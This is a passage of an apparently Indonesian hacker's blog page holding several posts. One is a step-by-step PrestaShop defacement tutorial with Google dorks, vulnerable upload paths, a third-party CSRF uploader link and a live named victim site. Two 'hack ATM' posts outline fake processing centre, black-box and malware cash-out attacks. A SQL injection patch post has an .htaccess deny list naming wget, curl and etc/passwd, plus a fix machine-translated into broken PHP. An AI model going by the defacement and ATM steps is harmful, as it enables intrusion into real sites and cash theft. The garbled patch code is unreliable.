Welcome!

IAM C0R3 Defacer Bug Hunter

View Work Hire Me!

About Me

Defacer
Bug Hunter
Desainer
Who am i

MR.C0R3 / ARIF

Open Learning Defacer And Bug Hunter

Minat? Chat Me On Whatsapp

https://wa.me/+6283175818524

List Skill

Defacer

Bug Hunter

Desainer

Pentester

Our Blog

Cara Patch Bug Sql Injection!




Cara Patch Bug SQL Injection


Sebuah serangan  
SQL Injection  adalah sebuah  metode serangan  yang dilakukan oleh  hacker jahat dengan cara memasukkan / menginjeksi  SQL Query / Perintah SQL melalui input data pada sebuah aplikasi. biasanya serangan ini terjadi pada bagian Kolom Pencarian / Kotak Pencarian, Formulir (Login, Daftar, dll), Parameter,  Header HTTP , dll.

Jika anda seorang  admin / webmaster , maka hal ini adalah sesuatu yang serius bagi anda, apalagi sekarang lagi ngetop banget  Serangan SQL Injection  ini. Maka Dari ITU Saya MEMBUAT Sebuah tutorial untuk review Mengatasi Serangan  Berbahaya  semacam  SQL Injection  inisial.

Contoh code yang  rentan / rentan terhadap SQL Injection:

<?php
$id = $_GET['id'];
$db = mysql_connect('localhost', 'admin', '123456');
mysql_select_db("bug", $db);
$query = "SELECT * FROM pengguna WHERE id = '".$id."'";
$hasil = mysql_query($query);
echo $hasil;
?>

Dalam tutorial ini saya memberikan sebuah contoh  kode PHP di atas  yang ada  bug SQL Injection  nya & memperbaiki bug tersebut dengan beberapa cara di bawah ini.

1.) Gunakan Prepared Statement pada SQL Query anda.

Prepared Statement  ini terdapat pada modul  PDO  di  MySQL  (Sudah ada diversi MySQL terbaru  ), Prepared Statement Menurut w3school:

Pernyataan Disiapkan  dan Parameter Terikat. Sebuah  pernyataan yang sudah disiapkan  adalah fitur yang digunakan untuk mengeksekusi yang sama (atau serupa) SQL  pernyataan  berulang kali dengan efisiensi tinggi. Pernyataan yang telah disiapkan  pada dasarnya bekerja seperti ini:  Mempersiapkan Templat pernyataan SQL  dibuat dan dikirim ke database.

Berikut contoh kode untuk memperbaiki bug SQL Injection pada kode.

<?php
$db_host = "localhost";
$db_name = "admin"; // database name
$db_user = "baru"; // datebase user
$db_pass = "123456"; // database password

$koneksi = "mysql:host=$db_host;dbname=$db_name";

try 
{
    $db = new PDO($koneksi, $db_user, $db_pass);   
}
catch (exception $e) 
{
    echo "error";
    exit();
}
$ id = $ _GET ['id']; $ sql = "PILIH * DARI pengguna DIMANA id = $ id"; $ stmt = $ db-> siapkan ($ sql); $ stmt-> eksekusi (); $ objek = $ stmt-> fetchObject (); echo $ objek-> nama;
?>

 2.) Gunakan filter pada kode PHP anda.

Filter ini berguna untuk menyaring input yang dimasukkan oleh pengguna dan memasukkan fitur Filter pada php ini juga bisa digunakan untuk meminilisir serangan SQL Injection pada parameter / situs web anda. berikut contoh codenya:

<?php
$id = filter_var($_POST['id'], FILTER_VALIDATE_INT); // Filter ini berguna untuk mefilter tipe
//data integer
$nama = filter_var($_POST['nama'], FILTER_SANITIZE_STRING);//untuk tipe string
?>

3.) Gunakan .htaccess untuk memfilter Query HTTP pada web server anda.

Metode ini biasanya digunakan oleh  plugin keamanan WordPress , saya juga dulu membuat metode ini dan lumayan ampuh untuk  menangkal serangan SQL Injection  dan sebagainya.


ServerSignature Off

Options -Indexes

RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]
RewriteRule ^(.*)$ - [F,L]
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteRule . - [S=1]
RewriteCond %{HTTP_USER_AGENT} (libwww-perl|wget|python|nikto|curl|scan|java|winhttp|clshttp|loader) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (<|>|'|%0A|%0D|%27|%3C|%3E|) [NC,OR]

RewriteCond %{HTTP_USER_AGENT} (;|<|>|'|"|\)|\(|%0A|%0D|%22|%27|%28|%3C|%3E|).*(libwww-perl|wget|python|nikto|curl|scan|java|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner) [NC,OR]

RewriteCond %{THE_REQUEST} \?\ HTTP/ [NC,OR]

RewriteCond %{THE_REQUEST} \/\*\ HTTP/ [NC,OR]

RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]

RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]

RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]

RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]

RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]

RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]

RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]

RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR]

RewriteCond %{QUERY_STRING} ftp\: [NC,OR]

RewriteCond %{QUERY_STRING} http\: [NC,OR]

RewriteCond %{QUERY_STRING} https\: [NC,OR]

RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]

RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]

RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR]

RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]

RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]

RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR]

RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]

RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR]

RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]

RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|) [NC,OR]

RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]

RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]

RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]

RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|).*(/\*|union|select|insert|drop|delete|update|cast|create|char|convert|alter|declare|order|script|set|md5|benchmark|encode) [NC,OR]

RewriteCond %{QUERY_STRING} (sp_executesql) [NC]

RewriteRule ^(.*)$ - [F,L]

4.) Pasang WAF (Web Application Firewall) Pada Server Web Anda.

WAF  (  Firewall Aplikasi Web  ) ini sangat penting dalam melindungi Web Server anda, Karena WAF sebagai sumber penjaga web anda dari berbagai serangan berbahaya (  SQL Injection , XSSSpamCSRF, dll). 
Berikut beberapa WAF yang dapat diandalkan untuk menjaga Web anda dari serangan Hacker Jahat: 3

  1. Firewall Aplikasi Web Jaringan Barracuda
  2. CloudFlare (  CDN  sekaligus WAF)
  3. Incapsula (  CDN  sekaligus WAF)
  4. Dan masih banyak lagi.

Ok, mungkin hanya itu yang saat ini yang bisa saya opini, jika anda memiliki tambahan, koreksi dan pertanyaan anda bisa meninggalkannya melalui kolom komentar dibawah ini. Semoga Be bermanfaat :') 

Cara Deface poc prestashop file Upload!!



Oke gan kali ini saya akan memberi sedikit tutor cara Deface prestashop file upload


Oke kita dorking dulu di crome/google


Dork : Inurl:"/modules/columnadverts/"

   Inurl:"/modules/homepageadvertise/"

   Inurl:"/modules/productpageadverts/"

   Inurl:"/modules/simpleslideshow/"

   Inurl:"/modules/vtemslideshow/"

   Index Of "/modules/columnadverts/"

   Index Of "/modules/homepageadvertise/"

   Index Of "/modules/productpageadverts/"

   Index Of "/modules/simpleslideshow/"

   Index Of "/modules/vtemslideshow/"


Exploit: http://loclahost/ modules/columnadverts/uploadimage.php

 http://localhost/ modules/homepageadvertise/uploadimage.php

 http://localhost/ modules/productpageadverts/uploadimage.php

 http://localhost/ modules/simpleslideshow/uploadimage.php

 http://localhost/ modules/vtemslideshow/uploadimage.php

Csrf : http://elearning.uzmcast.ac.zw/courses/ROM2020/document/csrfNeroXploit.html

Live : http://plantasygambas.com/modules/columnadverts/uploadimage.php


1.Kita dorking dulu dork nya

2.pilih salah satu site nya yang menurut kalian vuln

3.Kasih Exploit nya di belakang site

4.Click CSRF online nya http://elearning.uzmcast.ac.zw/courses/ROM2020/document/csrfNeroXploit.html

(masukin sitenya)

(kolom bawah isi dgn userfile)

up your file

How to acces my file?

http://site.com/modules/columnadverts/uploadimage.php


Ganti jadi

http://site.com/modules/columnadverts/slides/yourfile.php


Oke gan sekian tutorial dari saya C0r3X

Bahaya phising dan cara menghindari nya!

 



Hallo cuk bek lagi ama gw C0r3X :D... 

Kali ini gw mau nge bahas Bahaya Phising Dan Cara Menghindarinya!! 

Oke langsung ajee! ! 


PENGERTIAN PHISING DAN CARA MENGHINDARINYA


Pengertian phising dan cara menghindarinya menjadi sesuatu yang sangat penting untuk untuk dilakukan dan wajib dipahami agar anda tidak menjadi korban. Terlebih lagi di era yang berbasis global seperti saat ini. Banyak cara yang bisa diterapkan oleh penipu untuk melakukan hal tak diinginkan pada data yang anda miliki. Mereka bisa memanfaatkannya untuk membobol rekening anda atau menerapkan berbagai kegiatan yang berbahaya lainnya. Jika ini sampai terjadi, sudah pasti anda sendiri yang nantinya akan merugi. Karena itu, pada penerapannya memang sangat penting bagi anda untuk melakukan langkah yang tepat. Dengan penerapan metode yang tepat tersebut, sudah pasti akan lebih banyak lagi hasil dan manfaat yang akan bisa anda temukan dan capai di dalamnya.


Dijaman sekarang banyak sekali oknum tak bertanggung jawab yang melakukan tindakan satu ini guna mencuri data yang anda miliki. Pertanyaanya adalah apakah anda akan membiarkan hal tersebut terjadi begitu saja kepada anda? Tentu saja tidak bukan? Jangan biarkan data anda tersebut tersebar luas dan bisa diakses dengan mudahnya. Contohnya adalah ketika anda membuka suatu link yang mencurigakan di email. Lalu ketika anda mengekliknya maka anda akan diinstruksikan untuk memasukan data pribadi anda. Jelas ini adalah sebuah tindakan yang sangat mengerikan jika anda mengisi data pribadi anda dengan polosnya.


Secara jelas ini merupakan hal yang berbahaya karena data-data pribadi kita akan terkirim ke si penipu tsb, ini adalah jebakan untuk memasukan data, kata sandi, dan informasi penting lainnya. Yang mana nantinya oknum tersebut akan memanfaatkan informasi tersebut guna membobol rekening yang anda miliki. Parahnya lagi, hal tersebut terjadi tanpa pernah anda menyadarinya. Jadi jika sudah demikian, alangkah baiknya jika anda melakukan atau menerapkan langkah pencegahan sejak dini. Di sinilah anda pun akan bisa mendapatkan hasil dan manfaat luar biasa yang bisa anda temukan di dalamnya. Sudah paham tentang pengertian phising dan cara menghindarinya? Berikut adalah panduan selanjutnya.


Cara Menghindari Serangan Phising

PENGERTIAN PHISING DAN CARA MENGHINDARINYA


Tahapan selanjutnya adalah dalam ulasan mengenai pengertian phising dan cara menghindarinya ini adalah bagaimana anda mampu melakukan dan menerapkan semuanya dengan baik. Dengan semakin banyaknya teknologi digital yang ada saat ini, sudah pasti anda perlu melakukan beberapa penerapan signifikan di dalamnya. Di sinilah semuanya itu akan mampu menghadirkan kepada anda solusi dan juga cara terbaik agar terhindar dari hal-hal yang tidak diinginkan di dalamnya. Selengkapnya bisa anda lihat pada cara berikut tentang menghindarkan phising itu sendiri:


Jangan Pernah Klik Tautan Sembarangan

PENGERTIAN PHISING DAN CARA MENGHINDARINYA


Pada langkah awal yang perlu anda pahami dalam pengertian phising dan cara menghindarinya tersebut adalah tidak mengeklik tautan yang anda dapatkan secara sembarangan atau website yang mencurigakan. Kuncinya adalah tidak pernah mengeklik tautan apapun yang anda dapatkan tanpa alasan yang jelas. Biasanya hal ini akan anda temukan ketika hendak konfirmasi ulang password dan lain sebagainya. Akan tetapi, pahamilah dengan baik bahwa jika tautan tersebut datang kepada anda tanpa diundang dan anda merasa bahwa itu adalah indikasi SCAM, sebaiknya anda tidak pernah berkeinginan untuk mengekliknya. Apalagi memasukan data pribadi anda secara sadar di dalamnya.


Mencoba Install Anti Virus


Langkah berikutnya dalam penerapan pengertian phising dan cara menghindarinya tersebut adalah dengan menginstall Anti Virus. Bagaimanapun juga ini adalah langkah terpenting yang bisa anda terapkan guna mendapatkan manfaat signifikan yang diperlukan. Dengan hadirnya Anti Virus tersebut, sudah pasti hal ini jelas akan mendatangkan begitu banyak manfaat signifikan itu sendiri. Ketersediaan dari Anti Virus juga akan membawa anda pada banyak manfaat dan hal lainnya yang akan bisa anda dapatkan dan capai di dalamnya.


Hati-Hati Menyimpan Data Pribadi Secara Digital

PENGERTIAN PHISING DAN CARA MENGHINDARINYA


Lalu, yang juga sebaiknya anda perhatikan dalam pengertian phising dan cara menghindarinya tersebut adalah tidak menyimpan data anda secara digital dan sembarangan. Pada penerapannya, melakukan hal ini sama dengan membuat diri anda semakin merugi itu sendiri. Karena jika anda melakukannya dengan metode yang digital, sudah pasti hal tersebut akan benar-benar sangat merugikan bagi anda. Pada penerapannya, anda sendirilah yang nantinya akan bisa berpotensi mendapatkan masalah yang sangat signifikan. Untuk itu, jangan pernah melakukan hal ini. Karena pada dasarnya, semuanya itu akan bisa anda lakukan dan terapkan dengan metode dan cara yang sangat signifikan ada di dalamnya. Ketika anda mampu melakukan itu semua dengan tepat dan baik, maka dari situlah segalanya akan berubah dan bisa anda dapatkan dengan mudahnya.


Kenali lebih dekat Ciri-Ciri Website Phising


Lalu, yang juga tak kalah signifikannya lagi adalah bagaimana cara mengenali ciri-ciri dari web phising itu sendiri. Dalam hal pengertian phising dan cara menghindarinya ini, anda harus paham web mana saja yang memiliki jenis semacam ini. Contoh paling sederhana ada satu brand atau merk ternama yang anda kenal dengan baik. Lalu brand tersebut tiba-tiba memiliki website dalam bentuk blogspot atau domain gratis lainnya, atau website yang tidak jelas namanya yang menyuruh anda untuk memasukkan akun anda. Coba amati ini baik-baik, apakah menurut anda hal tersebut lazim dilakukan atau terjadi? Tentu saja anda sendiri harus mempertimbangkan hal tersebut dengan sangat baik. Kenapa? Karena dengan hadirnya web yang bersifat phising tersebut, sudah pasti anda harus memastikan diri anda aman dan tidak terjebak olehnya.


Tanda-Tanda Konten Yang Berbau Phising


Selain informasi tentang pengertian phising dan cara menghindarinya, anda harus paham betul apa saja tanda-tanda dari konten yang berbau phising itu sendiri. Dengan memahami hal ini, sudah pasti anda akan mampu mencapai semua yang anda butuhkan dan perlukan dengan mudahnya. Simak selengkapnya berikut ini tanda-tanda anda telah menjumpai konten yang berkategori phising di dalamnya:


Pertama, dalam penerapan pengertian phising dan cara menghindarinya tersebut, jika anda melihat suatu link yang mencurigakan dan ini masuk ke email yang anda tidak kenali siapa pengirimnya.


Kedua, sebagaimana yang sudah dijelaskan di atas, anda secara tidak sengaja mengeklik link tersebut. Tapi kemudian anda diarahkan ke halaman blogspot atau sejenisnya. Jelas hal tersebut akan menjadi masalah tersendiri dan tentu itu mencurigakan. Ketika anda mampu menerapkan semuanya dengan baik, sudah pasti hal tersebut akan memberikan kepada anda manfaat signifikan itu sendiri. Jadi tak ada yang perlu anda cemaskan lagi di dalamnya.


Ketiga, pada saat anda ingin melakukan metode pengertian phising dan cara menghindarinya yang tepat, sudah pasti tahapan untuk melakukannya adalah dengan melakukan semuanya dengan langkah yang baik. Tapi untuk tahu bahwa itu phising atau bukan anda lebih ke ketajaman insting anda dan lebih memerhatikan link website tsb yang anda miliki. Jadi anda wajib untuk memahami hal ini dengan sangat baik. Jadi anda pun akan mampu mendapatkan hasil nyata yang anda butuhkan di dalamnya.


Oke segitu aja penjelasan dari saya saya akhiri wassalamu'alaikum wr.wb

thanks to : clown security team 

Cara buat game dalam 5 menit



 1. Siapin link game nya dulu cuk

Link? http://www.trex-game.skipser.com/


2. download apk sketchware di playstore


3.kopi biar santuy wkwk


Nah pertama kita buka sketchware nah kalau udah buka 

Langka ke 2 kita pencet my projects

Nah trs isi sesuka kalian ke di bawah ini



Nah kalau udh kek di atas create app yah  


1.Nah kalau udh kita masukan webview ke layar hp di sketschware kaya di bawah ini


2.Nah kalau udh kita ke event pencet oncrate kalo sudah


3.Nah kalau iya kita masuk milih view nah kita pilih web view yang load url kek di bawah ini 


3.Nah load url nya kita isi sama link game 


4.Kalau udh kita keluar kita lakukan run 


Nah di situ sabar karena sedikit lama hehe


cara Hack Atm v2.


 Sebelum Anda Menguji Kerentanan atm atau memahami bug dalam bekerja? 

1) ATM terdiri dari subsistem elektronik dengan pengontrol industri. Namun, di belakang terminal ada komputer yang benar-benar konvensional yang mengontrol sistem, dalam banyak kasus dengan yang sudah ketinggalan zaman

sistem operasi.


2) Jika kasir bekerja dengan Windows XP, ia tidak akan lagi menerima dukungan teknis dari Microsoft, sehingga setiap kerentanan yang dideritanya akan tetap belum ditambal, membiarkannya tidak terlindung dari serangan hacker.


3) Sistem ATM memiliki perangkat lunak yang rentan, mulai dari pemutar Flash yang tidak diperbarui, dan dengan lebih dari 9.000 bug yang diketahui, hingga alat manajemen jarak jauh.


4) Pembuat terminal ini biasanya berpikir bahwa ATM selalu beroperasi dalam kondisi normal dan mereka tidak memiliki kesalahan operasi. Oleh karena itu, dalam banyak kasus, ATM tidak memiliki antivirus, atau otentikasi aplikasi yang bertanggung jawab untuk mengirim perintah ke mesin ATM tunai.


5) Jika bagian dari kasir tidak mengandung uang, mengapa khawatir dengan keamanannya?


> inilah yang dipikirkan oleh sebagian besar produsen ATM. Dengan demikian, mengakses setoran dan dispenser tiket adalah tugas yang rumit karena biasanya dilindungi dan diblokir.


6) akses ke komputer kasir cukup sederhana. Langkah-langkah keamanan tidak cukup untuk menghentikan penjahat cyber, karena komputer hanya dilindungi oleh kasing plastik atau logam tipis.


7) Modul ATM biasanya terhubung ke antarmuka standar, biasanya melalui port USB dan COM (port serial). Namun, banyak kali antarmuka dapat diakses dari jarak jauh.


8) Karena Internet adalah bentuk komunikasi paling ekonomis saat ini, bank menggunakan Jaringan untuk menghubungkan ATM ke pusat pemrosesan mereka. Namun, banyak bank tidak tahu bahwa terminal mereka muncul di mesin pencari Shodan.


> Situs ini memungkinkan siapa saja untuk menemukan berbagai macam sistem yang terhubung hanya dengan kata "admin" sebagai nama pengguna dan "1234" sebagai kata sandi, dengan demikian menunjukkan keamanan yang buruk dari perangkat ini.

By Revenge01 And Me. 

Thanks to 

- Clown security team

- 22 Xploiter Crew

- LulSecReborn

- Indonesian Fighter Cyber

- Indonesian Security Down

- Garuda Hacktivist Team

Cara Hack Atm v1.



HACK ATM V 1

By : Revenge01

And me 

1) pusat pemrosesan palsu:> Metode ini dapat digunakan jika penyerang dapat mengakses kabel yang menghubungkan kasir ke jaringan. Seorang hacker memutus ATM dari jaringan bank dan kemudian menghubungkannya ke perangkat yang bertindak sebagai pusat pemrosesan palsu. > Kasir digunakan untuk mengontrol penarikan uang tunai dan mengirimkan perintah kepada kasir yang meminta agar uang ditarik dari baki yang dipilih. Voila! Penyerang dapat menggunakan kartu apa pun atau memasukkan kode PIN apa pun, transaksi palsu akan tampak sah.

2) serangan jarak jauh pada beberapa ATM> Dalam metode ini diperlukan infiltrat untuk bekerja di bank. Pelaku mendapatkan (memperoleh) kunci dari jarak jauh yang digunakan untuk membuka rak kasir. Meskipun kunci ini tidak memungkinkan penyerang mengakses penarikan uang, kabel jaringan akan terbuka. Peretas memutus ATM dari jaringan bank dan menghubungkan perangkat khusus yang mengirim semua data ke server sendiri. > Seringkali, jaringan tempat Anda terhubung ke ATM tidak tersegmentasi dan ATM itu sendiri mungkin tidak terkonfigurasi. Dalam hal ini, dengan perangkat ini, peretas dapat membahayakan beberapa ATM sekaligus, bahkan jika perangkat jahat hanya terhubung ke salah satunya. > Sisa serangan dilakukan seperti yang telah kami jelaskan sebelumnya. Pusat pemrosesan palsu dipasang di server dan penyerang mendapatkan kendali penuh atas kasir. Menggunakan kartu apa saja, pelakunya dapat menarik uang dari kasir, terlepas dari model

3) Serangan Kotak Hitam> Seperti dalam metode yang dijelaskan di atas, penyerang mendapatkan kunci dari bingkai kasir dan menempatkan mesin ke mode pemeliharaan. Kemudian, hacker menghubungkan kotak hitam yang disebut ke port USB yang terbuka. Kotak hitam adalah perangkat yang memungkinkan peretas untuk mengontrol laci uang. > Sementara penjahat mengubah kasir, layar memperlihatkan pesan yang mengatakan "dalam pemeliharaan" atau "tidak berfungsi", meskipun, pada kenyataannya, dimungkinkan untuk mendapatkan uang dari kasir itu. Selain itu, kotak hitam dapat dikontrol secara nirkabel dengan smartphone. > hacker hanya perlu menekan tombol di layar untuk sacardinero secara tunai dan menyingkirkan kotak hitam untuk menyembunyikan bukti.

4) serangan malware> Ada dua cara untuk menginfeksi kasir dengan malware: memasukkan perangkat USB dengan malware (itu berarti memiliki kunci untuk membuka rak kasir) atau menginfeksi mesin dari jarak jauh, semua setelah kompromi dengan jaringan bank. > Jika kasir tidak terlindungi dari malware dan tidak menggunakan daftar putih, seorang hacker dapat meminta malware mengirim perintah ke kasir dan menjual uang. Serangan itu bisa diulang sampai uang kasir habis.

#sekian 

Thanks to my team 

- Clown Security team 

- 22 Xploiter Crew

- LulSecReborn

- Indonesian Fighter Cyber

- Indonesian Security down

- Garuda Hacktivist team

Contact Us

Phone :

+62 0831 7581 8524

Address :

Belitung Timur
Indonesian

Email :

perezarif@gmail.com

Cari Blog Ini

Diberdayakan oleh Blogger.

Arsip Blog

Cara Patch Bug Sql Injection!

Cara Patch Bug SQL Injection Sebuah serangan   SQL Injection   adalah sebuah   metode serangan   yang dilakukan oleh   hacker  jahat dengan ...